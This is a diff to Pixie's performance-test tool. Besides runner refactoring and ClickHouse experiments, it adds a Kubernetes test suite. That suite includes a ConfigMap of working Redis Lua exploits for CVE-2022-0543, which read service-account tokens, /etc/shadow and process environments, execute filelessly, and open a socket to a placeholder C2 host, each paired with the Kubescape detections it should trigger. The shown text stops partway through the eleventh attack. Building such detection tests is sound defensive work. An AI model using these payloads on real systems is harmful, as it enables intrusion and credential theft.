"//src/e2e_test/perf_tool/pkg/metrics", "//src/e2e_test/perf_tool/pkg/pixie", - "//src/shared/bq", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_gofrs_uuid//:uuid", "@com_github_gogo_protobuf//jsonpb", diff --git a/src/e2e_test/perf_tool/pkg/run/run.go b/src/e2e_test/perf_tool/pkg/run/run.go index b02b15219c2..2a5af23d06e 100644 --- a/src/e2e_test/perf_tool/pkg/run/run.go +++ b/src/e2e_test/perf_tool/pkg/run/run.go @@ -39,18 +39,22 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/deploy" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" - "px.dev/pixie/src/shared/bq" ) // Runner is responsible for running experiments using the 
ClusterProvider to get a cluster for the experiment. type Runner struct { c cluster.Provider pxCtx *pixie.Context - resultTable *bq.Table - specTable *bq.Table + exporter exporter.Exporter containerRegistryRepo string + skaffoldStderrFile string + // KeepOnFailure, when true, skips teardown (stop vizier/workloads/recorders + // and cluster cleanup) if the experiment errors, so the cluster state can + // be inspected after the fact. Successful runs still tear down normally. + keepOnFailure bool clusterCtx *cluster.Context clusterCleanup func() @@ -66,16 +70,24 @@ type Runner struct { } // NewRunner creates a new Runner for the given contexts. -func NewRunner(c cluster.Provider, pxCtx *pixie.Context, resultTable *bq.Table, specTable *bq.Table, containerRegistryRepo string) *Runner { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// during deploy steps. Pass "" to keep skaffold's stderr going only to the perf_tool +// process's stderr. +func NewRunner(c cluster.Provider, pxCtx *pixie.Context, exp exporter.Exporter, containerRegistryRepo, skaffoldStderrFile string) *Runner { return &Runner{ c: c, pxCtx: pxCtx, - resultTable: resultTable, - specTable: specTable, + exporter: exp, containerRegistryRepo: containerRegistryRepo, + skaffoldStderrFile: skaffoldStderrFile, } } +// SetKeepOnFailure toggles whether teardown is skipped on experiment failure. +func (r *Runner) SetKeepOnFailure(v bool) { + r.keepOnFailure = v +} + // RunExperiment runs an experiment according to the given ExperimentSpec. func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *experimentpb.ExperimentSpec) error { commitTopoOrder, err := getTopoOrder() @@ -83,14 +95,12 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return err } - eg := errgroup.Group{} - eg.Go(func() error { return r.getCluster(ctx, spec.ClusterSpec) }) - eg.Go(func() error { - if err := r.prepareWorkloads(ctx, spec); err != nil { - return backoff.Permanent(err) - } - return nil - }) + if err := r.getCluster(ctx, spec.ClusterSpec); err != nil { + return err + } + if err := r.prepareWorkloads(ctx, spec); err != nil { + return err + } r.metricsBySelector = make(map[string][]metrics.Recorder) r.metricsResultCh = make(chan *metrics.ResultRow) @@ -98,19 +108,23 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper defer metricsChCloseOnce.Do(func() { close(r.metricsResultCh) }) r.wg.Add(1) - go r.runBQInserter(expID) - - if err := eg.Wait(); err != nil { - if r.clusterCleanup != nil { - r.clusterCleanup() + go func() { + defer r.wg.Done() + if err := r.exporter.ExportResults(ctx, expID, r.metricsResultCh); err != nil { + log.WithError(err).Error("Failed to export results") } - if r.clusterCtx != nil { - r.clusterCtx.Close() + }() + + var runErr error + defer func() { + if r.keepOnFailure && runErr != nil { + log.WithError(runErr).Warn("Experiment failed; --keep_on_failure is set, leaving cluster state intact. " + + "Inspect with kubectl; you are responsible for manual cleanup (e.g. 
`px delete`, delete workload namespaces).") + return } - return err - } - defer r.clusterCleanup() - defer r.clusterCtx.Close() + r.clusterCleanup() + r.clusterCtx.Close() + }() var egCtx context.Context r.eg, egCtx = errgroup.WithContext(ctx) @@ -123,26 +137,16 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper }) if err := r.eg.Wait(); err != nil { + runErr = err return err } - // The experiment succeeded so we write the spec to bigquery. + // The experiment succeeded so we write the spec to the exporter. encodedSpec, err := (&jsonpb.Marshaler{}).MarshalToString(spec) if err != nil { return err } - specRow := &SpecRow{ - ExperimentID: expID.String(), - Spec: encodedSpec, - CommitTopoOrder: commitTopoOrder, - } - - inserter := r.specTable.Inserter() - inserter.SkipInvalidRows = false - - putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) - defer cancel() - if err := inserter.Put(putCtx, specRow); err != nil { + if err := r.exporter.ExportSpec(ctx, expID, encodedSpec, commitTopoOrder); err != nil { return err } @@ -152,8 +156,21 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return nil } -func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) error { +func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) (retErr error) { canceledErr := backoff.Permanent(context.Canceled) + // Collect start-action cleanups explicitly so we can skip them when + // --keep_on_failure is set and the experiment errors. + var cleanups []func() + defer func() { + failed := retErr != nil || ctx.Err() != nil + if r.keepOnFailure && failed { + log.Warn("Skipping per-action teardown due to --keep_on_failure") + return + } + for i := len(cleanups) - 1; i >= 0; i-- { + cleanups[i]() + } + }() for _, a := range spec.RunSpec.Actions { log.Tracef("started action %s", experimentpb.ActionType_name[int32(a.Type)]) if canceled := r.sendActionTimestamp(ctx, a, "begin"); canceled { @@ -165,19 +182,19 @@ func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSp if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_WORKLOADS: cleanup, err := r.startWorkloads(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_METRIC_RECORDERS: cleanup, err := r.startMetricRecorders(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.STOP_VIZIER: if err := r.stopVizier(); err != nil { return err @@ -233,7 +250,11 @@ func (r *Runner) startMetricRecorders(ctx context.Context, spec *experimentpb.Ex continue } - recorder := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + recorder, err := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + if err != nil { + _ = r.stopMetricRecorders(selector) + return noCleanup, fmt.Errorf("failed to create metrics recorder: %w", err) + } r.metricsBySelector[selector] = append(r.metricsBySelector[selector], recorder) if err := recorder.Start(ctx); err != nil { _ = r.stopMetricRecorders(selector) @@ -344,7 +365,7 @@ func (r *Runner) getCluster(ctx context.Context, spec *experimentpb.ClusterSpec) } func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.ExperimentSpec) error { - vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, spec.VizierSpec) + vizier, err := 
deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, spec.VizierSpec) if err != nil { return err } @@ -355,7 +376,7 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi } r.workloadsBySelector = make(map[string][]deploy.Workload) for _, s := range spec.WorkloadSpecs { - w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, s) + w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, s) if err != nil { return err } @@ -368,29 +389,6 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi return nil } -func (r *Runner) runBQInserter(expID uuid.UUID) { - defer r.wg.Done() - - bqCh := make(chan interface{}) - defer close(bqCh) - - inserter := &bq.BatchInserter{ - Table: r.resultTable, - BatchSize: 512, - PushTimeout: 2 * time.Minute, - } - go inserter.Run(bqCh) - - for row := range r.metricsResultCh { - bqRow, err := MetricsRowToResultRow(expID, row) - if err != nil { - log.WithError(err).Error("Failed to convert result row") - continue - } - bqCh <- bqRow - } -} - func getTopoOrder() (int, error) { cmd := exec.Command("git", "rev-list", "--count", "HEAD") var stdout bytes.Buffer diff --git a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel index 57b8a9fe368..5853d236094 100644 --- a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel @@ -22,11 +22,16 @@ go_library( "clusters.go", "experiments.go", "metrics.go", + "sovereign_soc.go", "suites.go", "workloads.go", ], embedsrcs = [ + "scripts/clickhouse_export.pxl", + "scripts/clickhouse_read.pxl", + "scripts/forensic_alerts.pxl", "scripts/healthcheck/http_data_in_namespace.pxl", + "scripts/healthcheck/redis_data_in_namespace.pxl", "scripts/healthcheck/vizier.pxl", "scripts/heap_size.pxl", "scripts/http_data_loss.pxl", diff --git a/src/e2e_test/perf_tool/pkg/suites/experiments.go b/src/e2e_test/perf_tool/pkg/suites/experiments.go index 998b31c7197..ceaf7408e2b 100644 --- a/src/e2e_test/perf_tool/pkg/suites/experiments.go +++ b/src/e2e_test/perf_tool/pkg/suites/experiments.go @@ -36,7 +36,7 @@ func HTTPLoadTestExperiment( dur time.Duration, ) *experimentpb.ExperimentSpec { e := &experimentpb.ExperimentSpec{ - VizierSpec: VizierWorkload(), + VizierSpec: VizierReleaseWorkload(), WorkloadSpecs: []*experimentpb.WorkloadSpec{ HTTPLoadTestWorkload(numConnections, targetRPS, true), }, @@ -347,6 +347,132 @@ func HTTPLoadApplicationOverheadExperiment( return e } +// ClickHouseExportExperiment drives load against Pixie's ClickHouse export +// path. An HTTP loadtest populates http_events on the PEMs, and the +// clickhouse_export PxL script runs on a tight period to continuously export +// a windowed slice of http_events to ClickHouse. +func ClickHouseExportExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. 
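+			// (The underlying forwarder race is the same one tolerated by the
+			// per-iteration retry in pxl_script_recorder.go.)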
+ HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, clickhouseDSN, clickhouseTable, clickhouseTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-export", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/export_window/%s", exportWindow), + ) + return e +} + +// ClickHouseReadExperiment drives load against Pixie's ClickHouse read path. +// HTTP loadtest populates http_events; a (placeholder) read-load workload +// drives sustained pressure against ClickHouse; the clickhouse_read PxL +// script periodically queries the ClickHouse source from Pixie so we can +// observe Pixie-side read performance as well. +func ClickHouseReadExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + readPeriod time.Duration, + readWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + ClickHouseReadLoadWorkload(), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseReadLoadMetric(readPeriod, clickhouseDSN, clickhouseTable, readWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-read", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/read_window/%s", readWindow), + ) + return e +} + func addTags(e *experimentpb.ExperimentSpec, tags ...string) *experimentpb.ExperimentSpec { if e.Tags == nil { e.Tags = []string{} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml new file mode 100644 index 00000000000..4ca461d9286 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-backend.yaml @@ -0,0 +1,190 @@ +# api — tier 2 (HTTP API) glueing the loadgen's HTTP traffic to redis +# (cache) + postgres (truth). Flask + gunicorn for concurrency. 
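+# (The Deployment below runs gunicorn with 4 gthread workers x 16 threads,
+# so up to 64 requests can be in flight per replica.)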
Each +# inbound request hits at least one Pixie-monitored protocol: +# +# GET /api/item/{id} → redis_events (cache lookup) +# → pgsql_events (only on cache miss) +# → redis_events (cache populate on miss) +# POST /api/event → pgsql_events (INSERT) +# → redis_events (cache invalidate DEL) +# GET /healthz → http_events only (loadgen sanity) +# +# Plus the api↔redis and api↔postgres connection establishment goes +# through cluster DNS, producing dns_events on the kube-dns pods. +# +# App code + requirements are mounted via ConfigMap so this is buildless — +# python:3.12-slim pip-installs flask/redis/psycopg2 on startup (~25 s +# one-shot cost; the gunicorn process then runs for the duration of the +# experiment). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: api-backend-src + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +data: + requirements.txt: | + flask==3.0.3 + gunicorn==22.0.0 + redis==5.0.7 + psycopg2-binary==2.9.9 + app.py: | + import logging + import os + import random + import time + from flask import Flask, jsonify, request + import redis + import psycopg2 + from psycopg2.pool import ThreadedConnectionPool + + log = logging.getLogger("api") + logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") + + REDIS_HOST = os.environ.get("REDIS_HOST", "redis") + REDIS_PORT = int(os.environ.get("REDIS_PORT", "6379")) + PG_DSN = os.environ.get( + "PG_DSN", + "host=postgres port=5432 dbname=appdb user=app password=app_password connect_timeout=5", + ) + CACHE_TTL = int(os.environ.get("CACHE_TTL", "30")) + + # Wait for backends with a tight retry loop — the loadgen pod may + # outrace postgres readiness. + def _wait(fn, label, attempts=60): + for i in range(attempts): + try: + fn() + log.info("%s ready", label) + return + except Exception as e: + log.info("waiting for %s (%d/%d): %s", label, i + 1, attempts, e) + time.sleep(2) + raise RuntimeError(f"{label} never became reachable") + + r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, socket_connect_timeout=2) + _wait(lambda: r.ping(), f"redis@{REDIS_HOST}:{REDIS_PORT}") + + pg_pool = None + def _open_pool(): + global pg_pool + pg_pool = ThreadedConnectionPool(minconn=2, maxconn=16, dsn=PG_DSN) + _wait(_open_pool, "postgres pool") + + app = Flask(__name__) + + @app.get("/healthz") + def healthz(): + return "ok", 200 + + @app.get("/api/item/") + def get_item(item_id): + key = f"item:{item_id}" + cached = r.get(key) + if cached is not None: + return jsonify({"id": item_id, "data": cached.decode(), "cache": True}) + conn = pg_pool.getconn() + try: + with conn.cursor() as cur: + cur.execute("SELECT data FROM items WHERE id = %s", (item_id,)) + row = cur.fetchone() + finally: + pg_pool.putconn(conn) + if row is None: + return jsonify({"error": "not found", "id": item_id}), 404 + r.setex(key, CACHE_TTL, row[0]) + return jsonify({"id": item_id, "data": row[0], "cache": False}) + + @app.post("/api/event") + def post_event(): + payload = request.get_data(as_text=True) or "{}" + conn = pg_pool.getconn() + try: + with conn.cursor() as cur: + cur.execute("INSERT INTO events (payload) VALUES (%s) RETURNING id", (payload,)) + eid = cur.fetchone()[0] + conn.commit() + finally: + pg_pool.putconn(conn) + # Bust a small set of cache keys to keep the cache layer churning. 
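+        # (3 keys sampled from the 100-key range, i.e. ~3% of the cache
+        # evicted per POST, which keeps GET /api/item misses steady.)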
+ for kid in random.sample(range(1, 101), 3): + r.delete(f"item:{kid}") + return jsonify({"id": eid}), 201 +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: api + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +spec: + replicas: 2 + selector: + matchLabels: + app.kubernetes.io/name: api + template: + metadata: + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc + # Pairs with api-sbob.yaml's `api-empty` profile so kubescape + # alerts from t=0. See feedback_kubescape_empty_profile. + kubescape.io/user-defined-profile: api-empty + spec: + containers: + - name: api + image: python:3.12-slim + imagePullPolicy: IfNotPresent + command: ["/bin/sh", "-c"] + args: + - | + set -e + cp /src/app.py /app/app.py + cp /src/requirements.txt /app/requirements.txt + pip install --no-cache-dir --root-user-action=ignore -r /app/requirements.txt + cd /app + exec gunicorn -w 4 -k gthread --threads 16 -b 0.0.0.0:8080 \ + --access-logfile - --access-logformat '%(h)s %(r)s %(s)s %(b)s %(L)ss' \ + app:app + env: + - {name: REDIS_HOST, value: redis} + - {name: REDIS_PORT, value: "6379"} + - {name: PG_DSN, value: "host=postgres port=5432 dbname=appdb user=app password=app_password connect_timeout=5"} + ports: + - {name: http, containerPort: 8080} + volumeMounts: + - {name: src, mountPath: /src} + - {name: workdir, mountPath: /app} + resources: + requests: {cpu: 200m, memory: 256Mi} + limits: {cpu: "2", memory: 1Gi} + readinessProbe: + httpGet: {path: /healthz, port: http} + initialDelaySeconds: 30 + periodSeconds: 5 + timeoutSeconds: 3 + failureThreshold: 24 + volumes: + - name: src + configMap: {name: api-backend-src} + - name: workdir + emptyDir: {} +--- +apiVersion: v1 +kind: Service +metadata: + name: api + namespace: redis + labels: + app.kubernetes.io/name: api + app.kubernetes.io/part-of: sovereign-soc +spec: + selector: + app.kubernetes.io/name: api + ports: + - {name: http, port: 8080, targetPort: http} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml new file mode 100644 index 00000000000..18f4e2828ef --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/api-sbob.yaml @@ -0,0 +1,20 @@ +--- +# Empty user-defined ApplicationProfile for the api-backend container. See +# redis-sbob.yaml for the rationale; same pattern, container name `api` +# matches api-backend.yaml. +apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1 +kind: ApplicationProfile +metadata: + name: api-empty + namespace: redis +spec: + architectures: + - amd64 + containers: + - name: api + capabilities: null + endpoints: null + execs: null + opens: null + syscalls: null + rulePolicies: {} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml new file mode 100644 index 00000000000..03a10f0dab8 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml @@ -0,0 +1,377 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-attacks.yaml (Apache-2.0 licensed), wrapped as a ConfigMap so +# the bobctl-attack Job can mount it at /suite/redis-attacks.yaml. The bobctl +# CLI consumes this file via its --attack-suite flag (it is NOT a Kubernetes +# CRD, it is a bobctl-internal manifest). 
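+# Each attack's expectedDetections entries name Kubescape rule IDs (R0001,
+# R0005, R0006, ...) that are defined in
+# helm-rendered/kubescape-default-rules.yaml, so the AlertLedger can join
+# alerts back to individual attacks by rule ID.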
+--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: bob-suite-attack + namespace: redis +data: + redis-attacks.yaml: | + apiVersion: bobctl.k8sstormcenter.io/v1alpha1 + kind: AttackSuite + metadata: + name: redis-full-attack-suite + description: >- + Comprehensive Redis attack suite (12 attacks) targeting a vulnerable + Redis 7.2.10 instance with CVE-2022-0543 (Lua sandbox escape via + package.loadlib / io.popen). Each attack has inline expectedDetections + for precise per-attack alert attribution via the AlertLedger. + target: + service: redis + namespace: redis + port: 6379 + protocol: redis + + attacks: + # ─── Attack 1: Fileless Execution via memfd_create (R1005) ─────────────── + - name: fileless-memfd-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'" + local f = io_mod.popen(cmd) + if not f then return 'popen_failed' end + local out = f:read('*a') + f:close() + return 'fileless:' .. out + successIndicators: + - responseContains: "fileless:" + expectedDetections: + - attackType: fileless + ruleID: R1005 + ruleName: "Fileless execution detected" + containerName: redis + + # ─── Attack 2: SA Token Exfiltration (R0006) ──────────────────────────── + - name: sa-token-exfil + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo no_token') + local out = f:read('*a') + f:close() + return out + successIndicators: + - responseContains: "eyJ" + expectedDetections: + - attackType: fileless + ruleID: R0006 + ruleName: "Unexpected service account token access" + containerName: redis + command: cat + + # ─── Attack 3: Sensitive File Access /etc/shadow (R0010) ───────────────── + - name: read-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /etc/shadow 2>&1; echo shadow_attempted') + local out = f:read('*a') + f:close() + return 'shadow:' .. 
out + successIndicators: + - responseContains: "shadow_attempted" + expectedDetections: + - attackType: fileless + ruleID: R0010 + ruleName: "Unexpected Sensitive File Access" + containerName: redis + command: cat + + # ─── Attack 4: Unexpected Process - whoami (R0001) ─────────────────────── + - name: unexpected-process-whoami + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('whoami') + local out = f:read('*a') + f:close() + return 'user:' .. out + successIndicators: + - responseContains: "user:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: whoami + + # ─── Attack 5: DNS Anomaly - resolve evil domain (R0005) ───────────────── + - name: dns-anomaly-evil-domain + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts evil.attacker.example.com 2>&1 || echo dns_done') + local out = f:read('*a') + f:close() + return 'dns:' .. out + successIndicators: + - responseContains: "dns:" + expectedDetections: + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 6: Drifted Binary Execution (R1001) ───────────────────────── + - name: drifted-binary-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/ls /tmp/drifted_redis && /tmp/drifted_redis /etc 2>&1; rm -f /tmp/drifted_redis') + local out = f:read('*a') + f:close() + return 'drifted:' .. out + successIndicators: + - responseContains: "drifted:" + expectedDetections: + - attackType: fileless + ruleID: R1001 + ruleName: "Drifted process executed" + containerName: redis + command: drifted_redis + + # ─── Attack 7: Execution from /dev/shm (R1000) ────────────────────────── + - name: exec-from-devshm + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cp /bin/echo /dev/shm/malicious && /dev/shm/malicious pwned 2>&1; rm -f /dev/shm/malicious') + local out = f:read('*a') + f:close() + return 'shm:' .. 
out + successIndicators: + - responseContains: "shm:" + expectedDetections: + - attackType: fileless + ruleID: R1000 + ruleName: "Process executed from malicious source" + containerName: redis + + # ─── Attack 8: Read /proc/*/environ (R0008) ───────────────────────────── + - name: read-proc-environ + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n" | head -3 || echo no_environ') + local out = f:read('*a') + f:close() + return 'environ:' .. out + successIndicators: + - responseContains: "environ:" + expectedDetections: + - attackType: fileless + ruleID: R0008 + ruleName: "Read Environment Variables from procfs" + containerName: redis + command: cat + + # ─── Attack 9: Symlink over /etc/shadow (R1010) ───────────────────────── + - name: symlink-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('ln -sf /etc/shadow /tmp/shadow_link 2>&1 && cat /tmp/shadow_link 2>/dev/null; rm -f /tmp/shadow_link') + local out = f:read('*a') + f:close() + return 'symlink:' .. out + successIndicators: + - responseContains: "symlink:" + expectedDetections: + - attackType: fileless + ruleID: R1010 + ruleName: "Soft link created over sensitive file" + containerName: redis + + # ─── Attack 10: Crypto Mining Domain DNS (R1008) ──────────────────────── + - name: crypto-mining-dns + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts xmr.pool.minergate.com 2>&1 || echo mining_dns_done') + local out = f:read('*a') + f:close() + return 'mining_dns:' .. out + successIndicators: + - responseContains: "mining_dns:" + expectedDetections: + - attackType: fileless + ruleID: R1008 + ruleName: "Crypto Mining Domain Communication" + containerName: redis + + # ─── Attack 11: Reverse Shell Attempt via Perl HTTP (R0001 + R0005) ───── + - name: reverse-shell-perl-http + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("perl -e 'use IO::Socket::INET;my $s=IO::Socket::INET->new(PeerAddr=>\"c2.evil.example.com\",PeerPort=>80,Timeout=>2);print defined $s ? \"connected\" : \"connect_failed\";' 2>&1; echo perl_http_done") + local out = f:read('*a') + f:close() + return 'revshell:' .. 
